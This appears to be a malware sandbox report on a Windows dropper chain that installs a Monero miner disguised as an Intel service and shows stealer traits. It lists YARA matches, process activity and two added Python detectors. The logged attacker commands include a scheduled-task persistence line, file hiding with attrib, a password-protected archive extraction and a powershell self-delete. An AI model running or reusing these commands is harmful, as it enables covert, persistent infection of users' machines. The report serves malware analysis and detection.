Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\output[1].png, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: file.bin.6.dr Zip Entry: encrypted
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: random[2].exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name: .idata
Source: random[2].exe.5.dr Static PE information: section name:
Source: b7c03317c9.exe.5.dr Static PE information: section name:
Source: b7c03317c9.exe.5.dr Static PE information: section name: .idata
Source: b7c03317c9.exe.5.dr Static PE information: section name:
Source: random[1].exe2.5.dr Static PE information: section name:
Source: random[1].exe2.5.dr Static PE information: section name: .idata
Source: random[1].exe2.5.dr Static PE information: section name:
Source: b2885fa695.exe.5.dr Static PE information: section name:
Source: b2885fa695.exe.5.dr Static PE information: section name: .idata
Source: b2885fa695.exe.5.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0016CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 5_2_0016CB97
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C896AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free, 10_2_00C896AC
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe File created: C:\Windows\Tasks\Gxtuum.job
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: Joe Sandbox View Dropped File: C:\Program Files\Windows Media Player\graph\graph.exe D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Process token adjusted: Security
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00B080C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00167A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0016D64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0016D942 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0016D663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0016DF80 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00188E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 001680C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: String function: 004029A6 appears 44 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
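The three INDICATOR_SUSPICIOUS_IMG_Embedded_Archive matches above flag the dropped output[1].png as an image with an archive glued onto it. The check below, added here as an example and not taken from the report or from the rule's author, finds where the image container really ends (PNG IEND chunk, JPEG EOI marker) and looks for ZIP/7z/RAR signatures in the trailing bytes that an image viewer would silently ignore. The PNG and JPEG samples are constructed inline, not the dropped files.

```python
"""Added example (not code from the report or the YARA rule author): flag an
image that carries an archive after its own terminator, which is what the
INDICATOR_SUSPICIOUS_IMG_Embedded_Archive matches describe for output[1].png.
All sample bytes below are constructed inline."""
import struct
import zlib
from typing import Optional, Tuple

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"

# Archive signatures that are commonly hidden behind an image.
ARCHIVE_MAGICS = {
    b"PK\x03\x04": "zip",
    b"7z\xbc\xaf\x27\x1c": "7z",
    b"Rar!\x1a\x07": "rar",
}


def image_end_offset(data: bytes) -> Optional[int]:
    """Offset one past the image's own terminator, or None if the bytes are not
    an image we understand.  Decoders ignore everything beyond this offset,
    which is exactly where a polyglot dropper hides its payload."""
    if data.startswith(PNG_MAGIC):
        # Walk the chunk list: 4-byte big-endian length, 4-byte type, data, CRC.
        pos = len(PNG_MAGIC)
        while pos + 8 <= len(data):
            length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
            pos += 8 + length + 4
            if ctype == b"IEND":
                return pos
        return None
    if data.startswith(JPEG_MAGIC):
        # A JPEG stream ends with the EOI marker FF D9.
        idx = data.find(b"\xff\xd9")
        return None if idx < 0 else idx + 2
    return None


def find_embedded_archive(data: bytes) -> Optional[Tuple[str, int]]:
    """Return (archive_type, absolute_offset) of the first archive signature in
    the trailing bytes, or None when the image ends where it should."""
    end = image_end_offset(data)
    if end is None:
        return None
    hits = []
    for magic, name in ARCHIVE_MAGICS.items():
        idx = data.find(magic, end)
        if idx >= 0:
            hits.append((idx, name))
    if not hits:
        return None
    offset, name = min(hits)
    return name, offset


# ---- constructed samples (not the dropped files from the report) ----
def _png_chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


# 1x1 8-bit greyscale IHDR followed by IEND; no IDAT, enough for header parsing.
CLEAN_PNG = (PNG_MAGIC
             + _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + _png_chunk(b"IEND", b""))
# The same image with a ZIP local-file header appended right after IEND.
POLYGLOT_PNG = CLEAN_PNG + b"PK\x03\x04" + b"\x14\x00" + b"\x00" * 24 + b"payload"
# Minimal JPEG: SOI, an APP0 marker with a 2-byte length, EOI, then a 7z header.
POLYGLOT_JPEG = b"\xff\xd8\xff\xe0\x00\x02" + b"\xff\xd9" + b"7z\xbc\xaf\x27\x1c" + b"\x00" * 8


if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_PNG), ("png+zip", POLYGLOT_PNG), ("jpeg+7z", POLYGLOT_JPEG)):
        print(label, find_embedded_archive(blob))
```

Because the PNG walker follows chunk lengths instead of searching for the literal string "IEND", an IDAT stream that happens to contain those four bytes does not produce a false end-of-image; the JPEG path keeps the simpler marker search and will stop at the first EOI it sees.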
Source: file.exe Static PE information: Section: ZLIB complexity 0.9982012091280654
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982012091280654
Source: random[2].exe.5.dr Static PE information: Section: pfkrromk ZLIB complexity 0.9940523481638418
Source: b7c03317c9.exe.5.dr Static PE information: Section: pfkrromk ZLIB complexity 0.9940523481638418
Source: random[1].exe2.5.dr Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: random[1].exe2.5.dr Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
Source: b2885fa695.exe.5.dr Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: b2885fa695.exe.5.dr Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
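The "ZLIB complexity" figures above are the ratio of a section's zlib-compressed size to its raw size; values close to 1.0 mean the bytes are already compressed or encrypted, which is what packed payload sections such as pfkrromk and wekcazbo look like, and the unnamed sections of file.exe and skotes.exe score the same way. The script below, added here as an example and not Joe Sandbox's own code, walks a PE section table with only the standard library and computes that ratio plus Shannon entropy per section. The 0.98 threshold and the two-section sample PE are assumptions built for the example.

```python
"""Added example, not code from the report or Joe Sandbox: walk a PE file's
section table with the standard library only and compute, per section, the
zlib compression ratio (the "ZLIB complexity" the report prints) and the
Shannon entropy.  Values near 1.0 / 8.0 mean packed or encrypted data.
The 0.98 threshold and the sample PE are assumptions constructed here."""
import math
import random
import struct
import zlib
from collections import Counter
from typing import Dict, Iterator, List, Tuple

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
PACKED_THRESHOLD = 0.98        # assumption for this example


def pe_sections(data: bytes) -> Iterator[Tuple[str, bytes]]:
    """Yield (name, raw_bytes) for every section.  Names may be empty, as the
    report shows for file.exe and skotes.exe."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE: missing MZ")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE: missing PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from(SECTION_HDR, data, table + 40 * i)[:5]
        yield name.rstrip(b"\0").decode("ascii", "replace"), data[raw_ptr:raw_ptr + raw_size]


def zlib_complexity(blob: bytes) -> float:
    """Compressed size over raw size; ~1.0 means incompressible (packed)."""
    return len(zlib.compress(blob, 9)) / len(blob) if blob else 0.0


def shannon_entropy(blob: bytes) -> float:
    """Bits per byte, 0..8."""
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values()) if n else 0.0


def analyse_sections(data: bytes) -> Dict[str, Dict[str, float]]:
    return {name: {"zlib_complexity": zlib_complexity(raw),
                   "entropy": shannon_entropy(raw), "size": len(raw)}
            for name, raw in pe_sections(data)}


def packed_sections(data: bytes, threshold: float = PACKED_THRESHOLD) -> List[str]:
    return [n for n, m in analyse_sections(data).items() if m["zlib_complexity"] >= threshold]


# ---- constructed sample: a header-only PE with one plain and one packed section ----
def build_pe(sections: List[Tuple[bytes, bytes]]) -> bytes:
    opt_size = 0xE0                                   # PE32 optional header size
    hdr_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    raw_ptr = (hdr_len + 0x1FF) & ~0x1FF              # raw data starts on a 0x200 boundary
    out = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))   # e_lfanew = 0x40
    out += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    out += b"\0" * opt_size                           # optional header contents are irrelevant here
    payload = bytearray()
    for name, raw in sections:
        out += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), len(raw), 0x1000,
                           len(raw), raw_ptr + len(payload), 0, 0, 0, 0, 0x60000020)
        payload += raw
    out += b"\0" * (raw_ptr - len(out))
    return bytes(out + payload)


_rng = random.Random(1337)
SAMPLE_PE = build_pe([
    (b".text", b"\x55\x8b\xec\x83\xec\x10\x90\xc3" * 512),            # repetitive, code-like bytes
    (b"pfkrromk", bytes(_rng.getrandbits(8) for _ in range(4096))),   # packed-looking; name as in the report
])

if __name__ == "__main__":
    for name, metrics in analyse_sections(SAMPLE_PE).items():
        print(f"{name or '<unnamed>':10} {metrics}")
    print("packed:", packed_sections(SAMPLE_PE))
```

Compression ratio and entropy usually agree, but not always: a section of a few kilobytes of plain text can reach entropy 5 while compressing to a fifth of its size, so the ratio is the more robust packer signal of the two.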
Source: random[2].exe1.5.dr, Program.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: random[2].exe1.5.dr, Program.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 322c3dce5b.exe.5.dr, Program.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 322c3dce5b.exe.5.dr, Program.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@84/60@12/13
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree, 6_2_00409606
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 10_2_00C8AC74
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C91D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 10_2_00C91D04
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040122A GetDiskFreeSpaceExW,SendMessageW, 6_2_0040122A
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow, 6_2_004092C1
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress, 6_2_004020BF
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Mutant created: \Sessions\1\BaseNamedObjects\48cb35e3030a2b429c6ac414faba9b49
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Mutant created: \Sessions\1\BaseNamedObjects\FloppyShip
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: b2885fa695.exe, 00000020.00000003.2583292514.0000000005665000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 55%
Source: file.exe ReversingLabs: Detection: 55%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe "C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe"
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe "C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe"
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
